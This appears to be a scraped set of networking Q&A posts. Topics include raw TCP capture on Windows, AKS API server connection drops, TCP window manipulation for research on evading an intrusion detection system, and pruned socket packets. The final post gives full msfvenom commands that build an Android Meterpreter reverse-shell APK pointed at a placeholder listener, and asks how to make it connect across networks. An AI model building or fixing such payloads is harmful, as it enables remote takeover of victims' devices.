How do I dump raw data from a TCP port in Windows using the netsh command?

I have an apparently simple problem that is proving very difficult to find an answer to.

The site has a highly secured Windows Server 2019 installation and an appliance connected to it that runs on a certain TCP port.

I need a sample of the raw data coming out of that port, captured over a few minutes and dumped into a binary file. It needs to be as raw as possible, i.e. it should match what we would read from the TCP stream if we connected to that same port from a local .NET application.
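
For clarity, this is roughly what I mean by "raw": the bytes a trivial client would capture if it connected to that port and dumped the stream straight to a file (just a sketch with a placeholder host and port; the actual capture has to happen with built-in tools on the server itself):

import socket
import time

HOST, PORT = "192.0.2.5", 9000    # placeholder appliance address and port
CAPTURE_SECONDS = 180             # "a few minutes"

with socket.create_connection((HOST, PORT), timeout=10) as sock, \
        open("capture.bin", "wb") as out:
    sock.settimeout(5)
    deadline = time.monotonic() + CAPTURE_SECONDS
    while time.monotonic() < deadline:
        try:
            chunk = sock.recv(4096)   # raw bytes, exactly as read from the stream
        except socket.timeout:
            continue                  # no data at the moment, keep waiting
        if not chunk:                 # peer closed the connection
            break
        out.write(chunk)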

It is highly preferable to use only built-in Windows tools for this (ideally netsh), but in the worst case WinDump or telnet would also be fine.

Go to Source
Author: Ruslan

Kubernetes API server unexpectedly stops responding

I have a managed Kubernetes cluster in Azure (AKS). There is one pod running a simple web service that responds to REST API calls from outside and calls the Kubernetes API server. These calls list and create some jobs.

For AKS, I have the ‘advanced’ (Azure CNI) networking with a custom routing table that redirects traffic to a virtual appliance – this is my company’s setup.

I’m using the official Python client for Kubernetes. The calls look like:

from kubernetes import client, config

config.load_incluster_config()  # use the pod's in-cluster service-account credentials
k8s_batch_api_client = client.BatchV1Api()
jobs = k8s_batch_api_client.list_namespaced_job(namespace='default')

So nothing special.

Most of the time, everything is working fine. However, from time to time, the Kubernetes API server just doesn’t respond to the requests, so my pod’s web service gets restarted after a timeout (it runs a gunicorn-based web server).

I installed tcpdump on my pod and sniffed the TCP traffic. I’m not a networking nerd, so bear with me.

The Python client keeps a TCP connection pool (using the urllib3 library). And it seems that the Kubernetes API server just silently 'loses' a TCP connection: it simply stops responding on it without ever closing the connection.

In Wireshark, I see this for a working request-response:

2438   09:41:50,796695   10.214.140.39    192.168.0.1     TLSv1.3   1614   Application Data
2439   09:41:50,798552   192.168.0.1      10.214.140.39   TCP       66     443 → 56480 [ACK]
2440   09:41:50,804064   192.168.0.1      10.214.140.39   TLSv1.3   2196   Application Data

10.214.140.39 is my pod, 192.168.0.1 is the Kubernetes API server. We see a request and a response here.

But then:

2469   09:48:48,853533   10.214.140.39   192.168.0.1      TLSv1.3   1580   Application Data
2470   09:48:48,853604   10.214.140.39   192.168.0.1      TLSv1.3   1279   Application Data
2471   09:48:48,868222   10.214.140.39   192.168.0.1      TCP       1279   [TCP Retransmission] 56480 → 443 [PSH, ACK]
2472   09:48:49,076276   10.214.140.39   192.168.0.1      TCP       1452   [TCP Retransmission] 56480 → 443 [ACK]
... lots of retransmissions...

I see no FIN TCP packet from the Kubernetes API server (which would indicate that the server wants to close the connection).

After restarting (2 minutes of retransmissions -> reboot), my pod can establish a connection to the API server right away – so the API server itself isn’t overloaded.

The same app runs without any issues on my local Minikube cluster (but there’s of course only one node, so not really representative).

How can I investigate the issue further? Can it be caused by the client side (by my pod or by the Python client)? Is there any special setting I must change on AKS or on my client side to avoid this? Does it look like a ‘server bug’ or a ‘network issue’?
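
The only client-side mitigation I have considered so far is passing an explicit request timeout, so a call on a dead pooled connection fails fast instead of hanging until gunicorn kills the worker. A sketch, assuming the standard _request_timeout parameter of the generated client (the tuple being connect and read timeouts in seconds); I don't know whether this addresses the root cause:

from kubernetes import client, config

config.load_incluster_config()
batch_api = client.BatchV1Api()

# Fail fast when the API server stops responding on a pooled connection:
# roughly 5 s to connect, 30 s to read the response (values are guesses).
jobs = batch_api.list_namespaced_job(
    namespace="default",
    _request_timeout=(5, 30),
)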

Go to Source
Author: dymanoid

What happens if a sender changes the TCP window size over multiple packets that have the same ACK number?

I’m currently doing research on evasion attacks that seek to bypass a Deep-learning based Network Intrusion Detection System.

In order to achieve this, I need to know what the constraints are for the TCP window size field in the TCP packet header. Imagine a client has just sent the last TCP ACK packet to a server to complete the 3-way handshake. The client then immediately proceeds to send a GET request to the server (these two packets are thus sent one after the other and contain the same ACK number).

What happens if the TCP window size in the TCP ACK packet does not match the window size in the TCP packet containing the GET request? Will the receiver simply use the last window size value it received? Or would this violate the TCP protocol in any way? You can assume that the change in window size is very small and will not cause the buffer to become full.
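
Concretely, the packet sequence I have in mind looks like this (a Scapy sketch with placeholder addresses, ports and sequence numbers; not the actual attack code):

from scapy.all import IP, TCP, Raw, send

CLIENT, SERVER = "192.0.2.10", "192.0.2.20"   # placeholder addresses
SPORT, DPORT = 54321, 80
SEQ, ACK = 1001, 5001                         # placeholder sequence/ACK numbers

# Final ACK of the 3-way handshake, advertising a window of 64240 bytes.
handshake_ack = IP(src=CLIENT, dst=SERVER) / TCP(
    sport=SPORT, dport=DPORT, flags="A", seq=SEQ, ack=ACK, window=64240)

# GET request sent immediately afterwards: same ACK number (the handshake ACK
# carries no data, so SEQ is unchanged too), but a slightly smaller window.
get_request = IP(src=CLIENT, dst=SERVER) / TCP(
    sport=SPORT, dport=DPORT, flags="PA", seq=SEQ, ack=ACK, window=64000) / Raw(
    b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n")

send([handshake_ack, get_request], verbose=False)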

More generally, if the client sends N uninterrupted packets (e.g. a heavy-load POST request), can he change the window size in each packet header without repercussions?

Go to Source
Author: Gints Engelen

Drawbacks of having pruned and collapsed packets

I am a newbie in the networking field. I came across a note saying that we should not have pruned or collapsed packets, and that if we do, we should optimize the system.

But neither the note nor the internet provided much context on why we shouldn't have pruned and collapsed packets, and what problems they cause.

$ netstat -s | grep socket      
299 packets pruned from receive queue because of socket buffer overrun
2701 TCP sockets finished time wait in fast timer
5 delayed acks further delayed because of locked socket
92 packets collapsed in receive queue due to low socket buffer

Here you can see that 299 packets were pruned and 92 packets were collapsed.

Is that bad? If yes, why? What issues will I face because of this?
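
To see whether this is an ongoing problem or just old history in the counters, I was going to watch whether the numbers keep increasing with something like this (just a sketch that re-runs the same netstat command once a minute):

import re
import subprocess
import time

PATTERN = re.compile(r"(\d+) packets (pruned|collapsed)")

def read_counters():
    """Parse the pruned/collapsed totals out of `netstat -s`."""
    out = subprocess.run(["netstat", "-s"], capture_output=True, text=True).stdout
    return {kind: int(count) for count, kind in PATTERN.findall(out)}

previous = read_counters()
while True:
    time.sleep(60)
    current = read_counters()
    for kind in ("pruned", "collapsed"):
        delta = current.get(kind, 0) - previous.get(kind, 0)
        if delta:
            print(f"{kind}: +{delta} packets in the last minute")
    previous = current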

Go to Source
Author: smc

Metasploit payload

I’m use the ms f venom to make a payload app for android and i share the app to may another phone with it own network then i install the app but there was no reaction in my listener phone
for host i use my listener IP that was in the info of phone
what IP i have to use and the payload has to be on – t c p – or HTTP
when i use the same network for my phones payload is worked
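
For reference, these are the two variants I'm deciding between (placeholder listener IP, ports and output file names):

# reverse TCP variant
msfvenom -p android/meterpreter/reverse_tcp LHOST=<listener-ip> LPORT=4444 -o app_tcp.apk
# reverse HTTP variant
msfvenom -p android/meterpreter/reverse_http LHOST=<listener-ip> LPORT=8080 -o app_http.apk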
Thanks for your response.

Go to Source
Author: Sith fiLe